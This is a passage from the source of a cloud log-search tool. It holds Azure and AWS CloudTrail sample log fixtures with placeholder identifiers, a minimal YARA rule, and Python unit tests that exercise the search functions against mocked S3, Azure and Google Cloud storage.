"caller": "test@email", 9 | "channels": "Operation", 10 | "claims": { 11 | "aud": "https://management.core.windows.net/", 12 | "ver": "1.0", 13 | "xms_cae": "1", 14 | "xms_tcdt": "1231293743" 15 | }, 16 | "correlationId": "b12321j3bhdgscj214j3b12rhv", 17 | "description": "", 18 | "eventDataId": "21371283ghjgfsdb9876123", 19 | "eventName": { 20 | "value": "EndRequest", 21 | "localizedValue": "End request" 22 | }, 23 | "httpRequest": { 24 | "clientRequestId": "9dsfghj1290-381293ghu123gvh123", 25 | "clientIpAddress": "11.11.11.10", 26 | "method": "POST", 27 | "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01" 28 | }, 29 | "id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612", 30 | "level": "Informational", 31 | "resourceGroupName": "Test", 32 | "resourceProviderName": { 33 | "value": "Microsoft.Storage", 34 | "localizedValue": "Microsoft.Storage" 35 | }, 36 | "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest", 37 | "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd", 38 | "operationName": { 39 | "value": "Microsoft.Storage/storageAccounts/listKeys/action", 40 | "localizedValue": "List Storage Account Keys" 41 | }, 42 | "status": { 43 | "value": "Succeeded", 44 | "localizedValue": "Succeeded" 45 | }, 46 | "subStatus": { 47 | "value": "OK", 48 | "localizedValue": "OK (HTTP Status Code: 200)" 49 | }, 50 | "tenantId": "12321MN3BNDASVBfD09SFDGSD" 51 | }, 52 | "version": 1, 53 | "eventId": "21371283ghjgfsdb9876123", 54 | "eventType": "AZURE_CLOUD" 55 | 56 | ] -------------------------------------------------------------------------------- /tests/data/bad_cloudtrail.json: -------------------------------------------------------------------------------- 1 | {"Records": [{ 2 | "eventVersion": "1.08", 3 | "userIdentity": { 4 | "type": "IAMUser", 5 | "principalId": "EXAMPLE6E4XEGITWATV6R", 6 | "arn": "arn:aws:iam::777788889999:user/Nikki", 7 | "accountId": "777788889999", 8 | "accessKeyId": "AKIAI44QH8DHBEXAMPLE", 9 | "userName": "Nikki", 10 | "sessionContext": { 11 | "sessionIssuer": {}, 12 | "webIdFederationData": {}, 13 | "attributes": { 14 | "creationDate": "2023-07-19T21:11:57Z", 15 | "mfaAuthenticated": "false" 16 | } 17 | } 18 | }, 19 | "eventTime": "2023-07-19T21:14:20Z", 20 | "eventSource": "ec2.amazonaws.com", 21 | "eventName": "StopInstances", 22 | "awsRegion": "us-east-1", 23 | "sourceIPAddress": "192.0.2.0", 24 | "userAgent": "aws-cli/2.13.5 Python/3.11.4 Linux/4.14.255-314-253.539.amzn2.x86_64 exec-env/CloudShell exe/x86_64.amzn.2 prompt/off command/ec2.stop-instances", 25 | "requestParameters": { 26 | "instancesSet": { -------------------------------------------------------------------------------- /tests/data/cloudtrail.json: -------------------------------------------------------------------------------- 1 | {"Records": [{ 2 | "eventVersion": "1.08", 3 | "userIdentity": { 4 | "type": "IAMUser", 5 | "principalId": "EXAMPLE6E4XEGITWATV6R", 6 | "arn": "arn:aws:iam::777788889999:user/Nikki", 7 | "accountId": "777788889999", 8 | "accessKeyId": "AKIAI44QH8DHBEXAMPLE", 9 | "userName": "Nikki", 10 | "sessionContext": { 11 | "sessionIssuer": {}, 12 | "webIdFederationData": {}, 13 | "attributes": { 14 | "creationDate": "2023-07-19T21:11:57Z", 15 | "mfaAuthenticated": "false" 16 | } 17 | } 18 | }, 19 | "eventTime": "2023-07-19T21:14:20Z", 20 | "eventSource": "ec2.amazonaws.com", 21 | "eventName": "StopInstances", 22 | "awsRegion": "us-east-1", 23 | "sourceIPAddress": "192.0.2.0", 24 | "userAgent": "aws-cli/2.13.5 Python/3.11.4 Linux/4.14.255-314-253.539.amzn2.x86_64 exec-env/CloudShell exe/x86_64.amzn.2 prompt/off command/ec2.stop-instances", 25 | "requestParameters": { 26 | "instancesSet": { 27 | "items": [ 28 | { 29 | "instanceId": "i-EXAMPLE56126103cb" 30 | }, 31 | { 32 | "instanceId": "i-EXAMPLEaff4840c22" 33 | } 34 | ] 35 | }, 36 | "force": false 37 | }, 38 | "responseElements": { 39 | "requestId": "c308a950-e43e-444e-afc1-EXAMPLE73e49", 40 | "instancesSet": { 41 | "items": [ 42 | { 43 | "instanceId": "i-EXAMPLE56126103cb", 44 | "currentState": { 45 | "code": 64, 46 | "name": "stopping" 47 | }, 48 | "previousState": { 49 | "code": 16, 50 | "name": "running" 51 | } 52 | }, 53 | { 54 | "instanceId": "i-EXAMPLEaff4840c22", 55 | "currentState": { 56 | "code": 64, 57 | "name": "stopping" 58 | }, 59 | "previousState": { 60 | "code": 16, 61 | "name": "running" 62 | } 63 | } 64 | ] 65 | } 66 | }, 67 | "requestID": "c308a950-e43e-444e-afc1-EXAMPLE73e49", 68 | "eventID": "9357a8cc-a0eb-46a1-b67e-EXAMPLE19b14", 69 | "readOnly": false, 70 | "eventType": "AwsApiCall", 71 | "managementEvent": true, 72 | "recipientAccountId": "777788889999", 73 | "eventCategory": "Management", 74 | "tlsDetails": { 75 | "tlsVersion": "TLSv1.2", 76 | "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", 77 | "clientProvidedHostHeader": "ec2.us-east-1.amazonaws.com" 78 | }, 79 | "sessionCredentialFromConsole": "true" 80 | }]} -------------------------------------------------------------------------------- /tests/data/cloudtrail_singleline.json: -------------------------------------------------------------------------------- 1 | {"Records":[{"eventVersion":"1.07","userIdentity":{"type":"AWSService","invokedBy":"cloudtrail.amazonaws.com"},"eventTime":"2020-07-31T23:58:37Z","eventSource":"s3.amazonaws.com","eventName":"PutObject","awsRegion":"us-east-1","sourceIPAddress":"cloudtrail.amazonaws.com","userAgent":"cloudtrail.amazonaws.com","requestParameters":{"bucketName":"some-bucket","Host":"some-bucket.s3.us-east-1.amazonaws.com","x-amz-acl":"bucket-owner-full-control","x-amz-server-side-encryption":"AES256","key":"AWSLogs/001/CloudTrail/us-east-1/2020/07/31/001_CloudTrail_us-east-1_20200731T2355Z_CPLMUNn9xXPXF33D.json.gz"},"responseElements":{"x-amz-server-side-encryption":"AES256"},"additionalEventData":{"SignatureVersion":"SigV4","CipherSuite":"ECDHE-RSA-AES128-SHA","bytesTransferredIn":791.0,"SSEApplied":"SSE_S3","AuthenticationMethod":"AuthHeader","x-amz-id-2":"rIbGKbhONVn+srdOdwCMERdRiHHFSgs8lvCJdFyCnR8O/r0KnwMQxPayr0rpNm/TlpfjFSLmZgw=","bytesTransferredOut":0.0},"requestID":"4C47E7CE1CBA28F9","eventID":"25d2f1da-c4ac-4201-9c97-e50869d6a636","readOnly":false,"resources":[{"type":"AWS::S3::Object","ARN":"arn:aws:s3:::some-bucket/AWSLogs/001/CloudTrail/us-east-1/2020/07/31/001_CloudTrail_us-east-1_20200731T2355Z_CPLMUNn9xXPXF33D.json.gz"},{"accountId":"001","type":"AWS::S3::Bucket","ARN":"arn:aws:s3:::some-bucket"}],"eventType":"AwsApiCall","managementEvent":false,"recipientAccountId":"001","sharedEventID":"d3a02cbc-7a82-4248-a81b-90074c2579a6","eventCategory":"Data"}]} -------------------------------------------------------------------------------- /tests/data/yara.rule: -------------------------------------------------------------------------------- 1 | rule get 2 | { 3 | strings: 4 | $get = "GET" nocase wide ascii 5 | condition: 6 | $get 7 | } -------------------------------------------------------------------------------- /tests/test_unit.py: -------------------------------------------------------------------------------- 1 | """ 2 | Basic unit tests for Cloud Grep 3 | python3 -m unittest discover tests 4 | """ 5 | 6 | import unittest 7 | import os 8 | import boto3 9 | from google.cloud import storage # type: ignore 10 | import timeout_decorator 11 | from moto import mock_aws 12 | from datetime import datetime 13 | from unittest.mock import patch, MagicMock 14 | import yara # type: ignore 15 | from io import StringIO 16 | from typing import List, BinaryIO 17 | import json 18 | import sys 19 | import csv 20 | 21 | from cloudgrep.cloud import Cloud 22 | from cloudgrep.search import Search 23 | from cloudgrep.cloudgrep import CloudGrep 24 | 25 | 26 | BASE_PATH = os.path.dirname(os.path.realpath(__file__)) 27 | 28 | 29 | class CloudGrepTests(unittest.TestCase): 30 | """Tests for Cloud Grep""" 31 | 32 | def test_weird_files(self) -> None: 33 | for filename in os.listdir(f"{BASE_PATH}/data/"): 34 | # Just checks we don't crash on any files 35 | Search().get_all_strings_line(f"{BASE_PATH}/data/" + filename) 36 | 37 | self.assertIn("SomeLine", Search().get_all_strings_line(f"{BASE_PATH}/data/14_3.log")) 38 | 39 | def test_gzip(self) -> None: 40 | found = Search().search_file(f"{BASE_PATH}/data/000000.gz", "000000.gz", ["Running on machine"], False, None) 41 | self.assertTrue(found) 42 | 43 | def test_zip(self) -> None: 44 | found = Search().search_file(f"{BASE_PATH}/data/000000.zip", "000000.zip", ["Running on machine"], False, None) 45 | self.assertTrue(found) 46 | 47 | def test_print_match(self) -> None: 48 | with patch("sys.stdout", new=StringIO()) as fake_out: 49 | Search().search_file(f"{BASE_PATH}/data/000000.zip", "000000.zip", ["Running on machine"], False, None) 50 | output = fake_out.getvalue().strip() 51 | self.assertIn("Running on machine", output) 52 | 53 | @timeout_decorator.timeout(5) 54 | @mock_aws 55 | def test_e2e(self) -> None: 56 | # This test uploads a couple of logs to mock s3 57 | # Then searches them 58 | _BUCKET = "mybucket" 59 | _QUERY = ["SomeLine"] 60 | 61 | conn = boto3.resource("s3", region_name="us-east-1") 62 | conn.create_bucket(Bucket=_BUCKET) 63 | s3 = boto3.client("s3", region_name="us-east-1") 64 | 65 | # All contain "SomeLine" 66 | for file_name in ["14_3.log", "35010_7.log", "apache_access.log"]: 67 | with open(f"{BASE_PATH}/data/{file_name}", "rb") as data: 68 | s3.upload_fileobj(data, _BUCKET, file_name) 69 | 70 | print("Checking we include every file") 71 | matching_keys = list(Cloud().get_objects(_BUCKET, "", None, None, None, 100000)) 72 | self.assertEqual(len(matching_keys), 3) 73 | 74 | print(f"Checking we get 3 hits for SomeLine in: {matching_keys}") 75 | hits = Cloud().download_from_s3_multithread(_BUCKET, matching_keys, _QUERY, False, None) 76 | self.assertEqual(hits, 3) 77 | 78 | print("Testing with multiple queries from a file") 79 | file = "queries.txt" 80 | with open(file, "w") as f: 81 | f.write(f"query1\n{_QUERY}\nquery3") 82 | multi_query = CloudGrep().load_queries(file) 83 | hits = Cloud().download_from_s3_multithread(_BUCKET, matching_keys, multi_query, False, None) 84 | self.assertEqual(hits, 3) 85 | 86 | # Upload 1000 logs 87 | for x in range(1000): 88 | with open(f"{BASE_PATH}/data/apache_access.log", "rb") as data: 89 | s3.upload_fileobj(data, _BUCKET, str(x)) 90 | 91 | Cloud().download_from_s3_multithread(_BUCKET, matching_keys, _QUERY, False, None) 92 | 93 | def test_object_not_empty_and_size_greater_than_file_size(self) -> None: 94 | obj = {"last_modified": datetime(2022, 1, 1), "size": 1000, "name": "example_file.txt"} 95 | key_contains = "example" 96 | from_date = datetime(2021, 1, 1) 97 | to_date = datetime(2023, 1, 1) 98 | file_size = 500 99 | result = Cloud().filter_object_azure(obj, key_contains, from_date, to_date, file_size) # type: ignore 100 | self.assertFalse(result) 101 | file_size = 500000 102 | result = Cloud().filter_object_azure(obj, key_contains, from_date, to_date, file_size) # type: ignore 103 | self.assertTrue(result) 104 | 105 | def test_returns_true_if_all_conditions_are_met(self) -> None: 106 | obj = storage.blob.Blob(name="example_file.txt", bucket="example_bucket") 107 | key_contains = "example" 108 | from_date = datetime(2021, 1, 1) 109 | to_date = datetime(2023, 1, 1) 110 | result = Cloud().filter_object_google(obj, key_contains, from_date, to_date) 111 | self.assertTrue(result) 112 | 113 | def test_returns_string_with_file_contents(self) -> None: 114 | file = "queries.txt" 115 | with open(file, "w") as f: 116 | f.write("query1\nquery2\nquery3") 117 | queries = CloudGrep().load_queries(file) 118 | self.assertIsInstance(queries, List) 119 | self.assertEqual(queries, ["query1", "query2", "query3"]) 120 | 121 | def test_yara(self) -> None: 122 | file_name = "valid_file.txt" 123 | key_name = "key_name" 124 | hide_filenames = True 125 | yara_rules = yara.compile(source='rule rule_name {strings: $a = "get" nocase wide ascii condition: $a}') 126 | with open(file_name, "w") as f: 127 | f.write("one\nget stuff\nthree") 128 | 129 | with patch("sys.stdout", new=StringIO()) as fake_out: 130 | matched = Search().yara_scan_file(file_name, key_name, hide_filenames, yara_rules, True) 131 | output = fake_out.getvalue().strip() 132 | 133 | self.assertTrue(matched) 134 | self.assertEqual(output, "{'match_rule': 'rule_name', 'match_strings': [$a]}") 135 | 136 | def test_json_output(self) -> None: 137 | with patch("sys.stdout", new=StringIO()) as fake_out: 138 | Search().search_file( 139 | f"{BASE_PATH}/data/000000.gz", "000000.gz", ["Running on machine"], False, None, None, [], True 140 | ) 141 | output = fake_out.getvalue().strip() 142 | 143 | self.assertTrue(json.loads(output)) 144 | 145 | def test_search_cloudtrail(self) -> None: 146 | log_format = "json" 147 | log_properties = ["Records"] 148 | Search().search_file( 149 | f"{BASE_PATH}/data/bad_cloudtrail.json", 150 | "bad_cloudtrail.json", 151 | ["Running on machine"], 152 | False, 153 | None, 154 | log_format, 155 | log_properties, 156 | ) 157 | Search().search_file( 158 | f"{BASE_PATH}/data/cloudtrail.json", 159 | "cloudtrail.json", 160 | ["Running on machine"], 161 | False, 162 | None, 163 | log_format, 164 | log_properties, 165 | ) 166 | with patch("sys.stdout", new=StringIO()) as fake_out: 167 | Search().search_file( 168 | f"{BASE_PATH}/data/cloudtrail_singleline.json", 169 | "cloudtrail_singleline.json", 170 | ["SignatureVersion"], 171 | False, 172 | None, 173 | log_format, 174 | log_properties, 175 | True, 176 | ) 177 | output = fake_out.getvalue().strip() 178 | self.assertIn("SignatureVersion", output) 179 | self.assertTrue(json.loads(output)) 180 | 181 | def test_filter_object_s3_empty_file(self) -> None: 182 | obj = {"LastModified": datetime(2023, 1, 1), "Size": 0, "Key": "empty_file.log"} 183 | key_contains = "empty" 184 | from_date = datetime(2022, 1, 1) 185 | to_date = datetime(2024, 1, 1) 186 | file_size = 10000 187 | self.assertFalse( 188 | Cloud().filter_object(obj, key_contains, from_date, to_date, file_size), 189 | "Empty file should have been filtered out", 190 | ) 191 | 192 | def test_filter_object_s3_out_of_date_range(self) -> None: 193 | obj = {"LastModified": datetime(2021, 1, 1), "Size": 500, "Key": "old_file.log"} 194 | key_contains = "old" 195 | from_date = datetime(2022, 1, 1) 196 | to_date = datetime(2024, 1, 1) 197 | file_size = 10000 198 | self.assertFalse( 199 | Cloud().filter_object(obj, key_contains, from_date, to_date, file_size), 200 | "Object older than from_date should not match", 201 | ) 202 | 203 | def test_search_logs_csv_format(self) -> None: 204 | line = "col1,col2\nval1,val2" 205 | mock_return = [{"col1": "val1", "col2": "val2"}] 206 | with patch.object(csv, "DictReader", return_value=mock_return): 207 | with patch("sys.stdout", new=StringIO()) as fake_out: 208 | Search().search_logs( 209 | line, 210 | key_name="test_csv", 211 | search="val1", 212 | hide_filenames=False, 213 | log_format="csv", 214 | log_properties=[], 215 | json_output=False, 216 | ) 217 | self.assertIn("val1", fake_out.getvalue()) 218 | 219 | def test_search_logs_unknown_format(self) -> None: 220 | line = '{"foo": "bar"}' 221 | with patch("sys.stdout", new=StringIO()): 222 | with patch("logging.error") as mock_log: 223 | Search().search_logs( 224 | line, 225 | key_name="unknown_format.log", 226 | search="bar", 227 | hide_filenames=False, 228 | log_format="not_a_real_format", 229 | log_properties=[], 230 | json_output=False, 231 | ) 232 | mock_log.assert_called_once() 233 | 234 | @mock_aws 235 | def test_cloudgrep_search_no_query_file(self) -> None: 236 | s3 = boto3.resource("s3", region_name="us-east-1") 237 | s3.create_bucket(Bucket="mybucket") 238 | with open("small.log", "w") as f: 239 | f.write("hello direct query") 240 | with open("small.log", "rb") as data: 241 | s3.Bucket("mybucket").put_object(Key="small.log", Body=data) 242 | 243 | cg = CloudGrep() 244 | with patch("sys.stdout", new=StringIO()) as fake_out: 245 | cg.search( 246 | bucket="mybucket", 247 | account_name=None, 248 | container_name=None, 249 | google_bucket=None, 250 | query=["hello"], 251 | file=None, 252 | yara_file=None, 253 | file_size=1000000, 254 | prefix="", 255 | key_contains=None, 256 | from_date=None, 257 | end_date=None, 258 | hide_filenames=False, 259 | log_type=None, 260 | log_format=None, 261 | log_properties=[], 262 | profile=None, 263 | json_output=False, 264 | ) 265 | output = fake_out.getvalue().strip() 266 | self.assertIn("hello direct query", output) 267 | 268 | @mock_aws 269 | def test_cloudgrep_search_with_profile(self) -> None: 270 | s3 = boto3.resource("s3", region_name="us-east-1") 271 | s3.create_bucket(Bucket="prof-bucket") 272 | with open("small.log", "w") as f: 273 | f.write("Hello test profile") 274 | with open("small.log", "rb") as data: 275 | s3.Bucket("prof-bucket").put_object(Key="small.log", Body=data) 276 | 277 | with patch("boto3.setup_default_session") as mock_setup_session: 278 | cg = CloudGrep() 279 | cg.search( 280 | bucket="prof-bucket", 281 | account_name=None, 282 | container_name=None, 283 | google_bucket=None, 284 | query=["Hello"], 285 | file=None, 286 | yara_file=None, 287 | file_size=1000000, 288 | prefix="", 289 | key_contains=None, 290 | from_date=None, 291 | end_date=None, 292 | hide_filenames=False, 293 | log_type=None, 294 | log_format=None, 295 | log_properties=[], 296 | profile="my_aws_profile", 297 | json_output=False, 298 | ) 299 | mock_setup_session.assert_called_with(profile_name="my_aws_profile") 300 | 301 | def test_main_no_args_shows_help(self) -> None: 302 | from cloudgrep.__main__ import main 303 | 304 | with patch.object(sys, "argv", ["prog"]): 305 | # Argparse prints help to sys.stderr 306 | with patch("sys.stderr", new=StringIO()) as fake_err: 307 | with self.assertRaises(SystemExit): 308 | main() 309 | self.assertIn("usage: prog", fake_err.getvalue()) 310 | 311 | @patch("cloudgrep.cloud.BlobServiceClient.from_connection_string") 312 | def test_azure_search_mocked(self, mock_service_client: MagicMock) -> None: 313 | # Mock azure client to do basic azure test 314 | 315 | container_client = MagicMock() 316 | mock_service_client.return_value.get_container_client.return_value = container_client 317 | 318 | blob_mock = MagicMock() 319 | blob_mock.name = "testblob.log" 320 | blob_mock.size = 50 321 | blob_mock.last_modified = datetime(2022, 1, 1) 322 | container_client.list_blobs.return_value = [blob_mock] 323 | 324 | blob_client_mock = MagicMock() 325 | container_client.get_blob_client.return_value = blob_client_mock 326 | 327 | # Actually written to a local file 328 | fake_content = b"Some Azure log entry that mentions azure target" 329 | 330 | def fake_readinto_me(file_obj: BinaryIO) -> None: 331 | file_obj.write(fake_content) 332 | 333 | blob_data_mock = MagicMock() 334 | blob_data_mock.readinto.side_effect = fake_readinto_me 335 | blob_client_mock.download_blob.return_value = blob_data_mock 336 | 337 | with patch("sys.stdout", new=StringIO()) as fake_out: 338 | CloudGrep().search( 339 | bucket=None, 340 | account_name="fakeaccount", 341 | container_name="fakecontainer", 342 | google_bucket=None, 343 | query=["azure target"], # Our search term 344 | file=None, 345 | yara_file=None, 346 | file_size=1000000, 347 | prefix=None, 348 | key_contains=None, 349 | from_date=None, 350 | end_date=None, 351 | hide_filenames=False, 352 | log_type=None, 353 | log_format=None, 354 | log_properties=[], 355 | profile=None, 356 | json_output=False, 357 | ) 358 | output = fake_out.getvalue().strip() 359 | 360 | # Check in fake file 361 | self.assertIn("azure target", output, "Should match the azure target text in the downloaded content") 362 | 363 | @patch("cloudgrep.cloud.storage.Client") 364 | def test_google_search_mocked(self, mock_storage_client: MagicMock) -> None: 365 | # Basic coverage for gcp search 366 | bucket_mock = MagicMock() 367 | mock_storage_client.return_value.get_bucket.return_value = bucket_mock 368 | 369 | blob_mock = MagicMock() 370 | blob_mock.name = "test_gcs_file.log" 371 | blob_mock.updated = datetime(2023, 1, 1) 372 | bucket_mock.list_blobs.return_value = [blob_mock] 373 | 374 | def fake_download_to_filename(local_path: str) -> None: 375 | with open(local_path, "wb") as f: 376 | f.write(b"This is some fake file: google target") 377 | 378 | blob_mock.download_to_filename.side_effect = fake_download_to_filename 379 | 380 | with patch("sys.stdout", new=StringIO()) as fake_out: 381 | CloudGrep().search( 382 | bucket=None, 383 | account_name=None, 384 | container_name=None, 385 | google_bucket="fake-gcs-bucket", 386 | query=["google target"], 387 | file=None, 388 | yara_file=None, 389 | file_size=1000000, 390 | prefix=None, 391 | key_contains=None, 392 | from_date=None, 393 | end_date=None, 394 | hide_filenames=False, 395 | log_type=None, 396 | log_format=None, 397 | log_properties=[], 398 | profile=None, 399 | json_output=False, 400 | ) 401 | output = fake_out.getvalue().strip() 402 | 403 | self.assertIn("google target", output, "Should match the google target text in the downloaded content") 404 | 405 | @mock_aws 406 | def test_list_files_returns_pre_filtered_files(self) -> None: 407 | """ 408 | Test that list_files() returns only the S3 objects that match 409 | the specified filters (e.g. key substring and non‑empty content). 410 | """ 411 | bucket_name = "list-files-test-bucket" 412 | # Create a fake S3 bucket 413 | s3_resource = boto3.resource("s3", region_name="us-east-1") 414 | s3_resource.create_bucket(Bucket=bucket_name) 415 | s3_client = boto3.client("s3", region_name="us-east-1") 416 | 417 | # Upload several objects: 418 | # - Two objects that match 419 | s3_client.put_object(Bucket=bucket_name, Key="log_file1.txt", Body=b"dummy content") 420 | s3_client.put_object(Bucket=bucket_name, Key="log_file2.txt", Body=b"dummy content") 421 | # Onne that doesnt match the key_contains filter 422 | s3_client.put_object(Bucket=bucket_name, Key="not_a_thing.txt", Body=b"dummy content") 423 | # One that doesnt match the file_size filter 424 | s3_client.put_object(Bucket=bucket_name, Key="log_empty.txt", Body=b"") 425 | 426 | # Call list files 427 | cg = CloudGrep() 428 | result = cg.list_files( 429 | bucket=bucket_name, 430 | account_name=None, 431 | container_name=None, 432 | google_bucket=None, 433 | prefix="", 434 | key_contains="log", 435 | from_date=None, 436 | end_date=None, 437 | file_size=1000000 # 1 MB 438 | ) 439 | 440 | # Assert only the matching files are returned 441 | self.assertIn("s3", result) 442 | expected_keys = {"log_file1.txt", "log_file2.txt"} 443 | self.assertEqual(set(result["s3"]), expected_keys) 444 | 445 | # Now search the contents of the files and assert they hit 446 | for key in expected_keys: 447 | with patch("sys.stdout", new=StringIO()) as fake_out: 448 | cg.search( 449 | bucket=bucket_name, 450 | account_name=None, 451 | container_name=None, 452 | google_bucket=None, 453 | query=["dummy content"], 454 | file=None, 455 | yara_file=None, 456 | file_size=1000000, 457 | prefix="", 458 | key_contains=key, 459 | from_date=None, 460 | end_date=None, 461 | hide_filenames=False, 462 | log_type=None, 463 | log_format=None, 464 | log_properties=[], 465 | profile=None, 466 | json_output=False, 467 | files=result, # Pass the pre-filtered files from list_files 468 | ) 469 | output = fake_out.getvalue().strip() 470 | self.assertIn("log_file1.txt", output) --------------------------------------------------------------------------------